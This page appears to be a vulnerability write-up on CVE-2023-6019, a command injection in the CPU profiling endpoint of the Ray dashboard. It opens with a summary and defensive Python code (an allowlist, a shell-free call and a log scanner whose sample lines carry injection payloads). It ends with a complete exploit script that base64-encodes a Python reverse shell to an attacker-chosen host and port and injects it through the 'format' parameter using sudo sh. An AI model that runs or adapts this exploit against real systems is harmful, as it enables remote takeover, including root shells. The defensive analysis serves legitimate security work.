The CPU profiling page of Ray OS v2.6.3 contains a command injection vulnerability through which an attacker can execute arbitrary commands. If the system is configured to allow passwordless sudo (which some Ray configurations require), the attacker obtains root privileges; otherwise the attacker obtains a user-level shell. The vulnerability affects Ray OS v2.6.3 and earlier, and an attacker can take control of the system by sending a crafted request.
🎯 The vulnerability stems from the `format` parameter of the CPU profiling page in Ray OS v2.6.3 and earlier not being validated, so an attacker can inject malicious commands through that parameter.
💻 An attacker can craft a request that places a base64-encoded shell command in the `format` parameter and, via the system's command execution, ultimately gain control of the system.
🛡️ Fixing the vulnerability requires strict validation of the `format` parameter to prevent command injection. Users are also advised to disable passwordless sudo to improve system security.
🚀 To prevent exploitation, users are advised to update to the latest version promptly or apply other security measures, such as disabling the CPU profiling feature or protecting the system with security software.
⚠️ Exploiting the vulnerability requires the attacker to have access to the Ray OS server, which could be obtained through network attacks or social engineering.
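The defensive side of the fix described above, as an added example that is not code from this page or from the Ray project: a strict allowlist for the `format` parameter, the profiler invoked through an argv list with no shell so that metacharacters can never become shell syntax, and a scan over access-log lines for `format` values that fall outside the allowlist. The profiler command line (`py-spy record --format ...`), the three format names and the sample log lines are all assumptions constructed for the example, not taken from the page.

```python
"""Added example (not from the page or the Ray project): hardening and
detection for a command-injected ``format`` query parameter.

Assumptions (not on the page): the profiler is invoked as
``py-spy record --format <fmt>`` and the legitimate values are
``flamegraph``, ``raw`` and ``speedscope``. The log lines are constructed.
"""
import re
import subprocess
from typing import Dict, List
from urllib.parse import parse_qs, urlsplit

# Allowlist of profiler output formats (assumed; adjust to the real tool).
ALLOWED_FORMATS = frozenset({"flamegraph", "raw", "speedscope"})


def is_allowed_format(value: str) -> bool:
    """True only for an exact allowlisted value; no pattern matching."""
    return value in ALLOWED_FORMATS


def validate_format(value: str) -> str:
    """Return the value if allowlisted, otherwise refuse it outright.

    Anything else, even a value that merely *looks* odd, is rejected before
    it can reach a command line. There is no escaping step to get wrong.
    """
    if not is_allowed_format(value):
        raise ValueError(f"unsupported profiler format: {value!r}")
    return value


def build_profile_argv(pid: int, duration: int, fmt: str) -> List[str]:
    """Build the profiler command as an argv list (no shell involved).

    With a list and shell=False, characters such as ``$IFS``, ``|`` and ``;``
    inside an argument are plain bytes handed to the program, never syntax.
    """
    if not isinstance(pid, int) or pid <= 0:
        raise ValueError("pid must be a positive integer")
    if not isinstance(duration, int) or not 1 <= duration <= 300:
        raise ValueError("duration must be between 1 and 300 seconds")
    return ["py-spy", "record", "--pid", str(pid), "--duration", str(duration),
            "--format", validate_format(fmt)]


def run_profile(pid: int, duration: int, fmt: str) -> subprocess.CompletedProcess:
    """Run the validated command; shell=False is the default and stays so."""
    return subprocess.run(build_profile_argv(pid, duration, fmt),
                          check=True, capture_output=True, text=True)


# Constructed access-log lines ("METHOD path status"), not real traffic.
# The second carries the injection shape the page describes: the format
# parameter is turned into a decode-and-execute pipeline.
SAMPLE_LOG = """\
GET /worker/cpu_profile?pid=3354&ip=10.0.0.5&duration=5&native=0&format=flamegraph 200
GET /worker/cpu_profile?pid=3354&ip=10.0.0.5&duration=5&native=0&format=echo%20QUJD%20|base64$IFS-d|sudo%20sh 500
GET /worker/cpu_profile?pid=42&ip=10.0.0.5&duration=5&native=0&format=speedscope 200
GET /worker/cpu_profile?pid=42&ip=10.0.0.5&duration=5&native=0&format=raw%26%26id 500
"""

SHELL_META = re.compile(r"[|;&`$<>\n]")
CMD_WORDS = re.compile(r"base64|sudo|\bsh\b|bash|python|curl|wget")


def find_suspicious_requests(log_text: str) -> List[Dict[str, object]]:
    """Flag cpu_profile requests whose format value is not allowlisted.

    parse_qs already percent-decodes, so ``%20`` becomes a space here and the
    decoded value is what the vulnerable handler would have seen.
    """
    hits = []
    for line in log_text.splitlines():
        parts = line.split()
        if len(parts) < 2 or not parts[1].startswith("/worker/cpu_profile"):
            continue
        query = parse_qs(urlsplit(parts[1]).query, keep_blank_values=True)
        for fmt in query.get("format", []):
            if is_allowed_format(fmt):
                continue
            reasons = []
            if SHELL_META.search(fmt):
                reasons.append("shell metacharacters")
            if CMD_WORDS.search(fmt):
                reasons.append("command keywords")
            hits.append({"line": line, "format": fmt,
                         "reasons": reasons or ["not on allowlist"]})
    return hits


if __name__ == "__main__":
    print(build_profile_argv(3354, 5, "flamegraph"))
    for hit in find_suspicious_requests(SAMPLE_LOG):
        print(hit["format"], "->", ", ".join(hit["reasons"]))
```

The allowlist check is the actual fix; the log scan is for finding attempts that hit a host before the patch landed, and the two reason tags only explain a hit that the allowlist already decided.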
```python
# Exploit Title: Ray OS v2.6.3 - Command Injection RCE (Unauthorized)
# Description:
# The Ray Project dashboard contains a CPU profiling page, and the format parameter is
# not validated before being inserted into a system command executed in a shell, allowing
# for arbitrary command execution. If the system is configured to allow passwordless sudo
# (a setup some Ray configurations require) this will result in a root shell being returned
# to the user. If not configured, a user level shell will be returned
# Version: <= 2.6.3
# Date: 2024-4-10
# Exploit Author: Fire_Wolf
# Tested on: Ubuntu 20.04.6 LTS
# Vendor Homepage: https://www.ray.io/
# Software Link: https://github.com/ray-project/ray
# CVE: CVE-2023-6019
# Refer: https://huntr.com/bounties/d0290f3c-b302-4161-89f2-c13bb28b4cfe
# ==========================================================================================
# !usr/bin/python3
# coding=utf-8
import base64
import argparse
import requests
import urllib3

proxies = {"http": "127.0.0.1:8080"}
headers = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0"}


def check_url(target, port):
    target_url = target + ":" + port
    https = 0
    if 'http' not in target:
        try:
            urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
            test_url = 'http://' + target_url
            response = requests.get(url=test_url, headers=headers, verify=False, timeout=3)
            if response.status_code != 200:
                is_https = 0
                return is_https
        except Exception as e:
            print("ERROR! \nThe Exception is:" + format(e))
    if https == 1:
        return "https://" + target_url
    else:
        return "http://" + target_url


def exp(target, ip, lhost, lport):
    payload = 'python3 -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("' + lhost + '",' + lport + '));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")\''
    print("[*]Payload is: " + payload)
    b64_payload = base64.b64encode(payload.encode())
    print("[*]Base64 encoding payload is: " + b64_payload.decode())
    exp_url = target + '/worker/cpu_profile?pid=3354&ip=' + str(ip) + '&duration=5&native=0&format=echo ' + b64_payload.decode() + ' |base64$IFS-d|sudo%20sh\n'
    # response = requests.get(url=exp_url, headers=headers, verify=False, timeout=3, prxoy=proxiess)
    print(exp_url)
    urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
    response = requests.get(url=exp_url, headers=headers, verify=False)
    if response.status_code == 200:
        print("[-]ERROR: Exploit Failed,please check the payload.")
    else:
        print("[+]Exploit is finished,please check your machine!")


if __name__ == '__main__':
    parser = argparse.ArgumentParser(
        description='''⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⡠⠄⡄⡄⡠⡀⣀⡀⢒⠄⡔⡄⢒⠄⢒⠄⣀⡀⣖⡂⡔⡄⢴⠄⣖⡆⠄⠄⡤⡀⡄⡄⠑⠂⠘⠄⠙⠂⠄⠄⠓⠂⠑⠁⠓⠂⠒⠁⠄⠄⠓⠃⠑⠁⠚⠂⠒⠃⠐⠄⠗⠁⠬⠃⢰⣱⢠⢠⠠⡦⢸⢄⢀⢄⢠⡠⠄⠄⢸⠍⠠⡅⢠⡠⢀⢄⠄⠄⢸⣸⢀⢄⠈⡇⠠⡯⠄⠘⠘⠈⠚⠄⠓⠘⠘⠈⠊⠘⠄⠄⠁⠘⠄⠐⠓⠘⠄⠈⠓⠠⠤⠘⠙⠈⠊⠐⠓⠄⠃⠄⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⣀⡀⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄''',
        formatter_class=argparse.RawDescriptionHelpFormatter,
    )
    parser.add_argument('-t', '--target', type=str, required=True, help='target ip')
    parser.add_argument('-p', '--port', type=str, default=80, required=False, help='target host port')
    parser.add_argument('-L', '--lhost', type=str, required=True, help='listening host ip')
    parser.add_argument('-P', '--lport', type=str, default=80, required=False, help='listening port')
    args = parser.parse_args()
    # target = args.target
    ip = args.target
    # port = args.port
    # lhost = args.lhost
    # lport = args.lport
    targeturl = check_url(args.target, args.port)
    print(targeturl)
    print("[*] Checking in url: " + targeturl)
    exp(targeturl, ip, args.lhost, args.lport)
```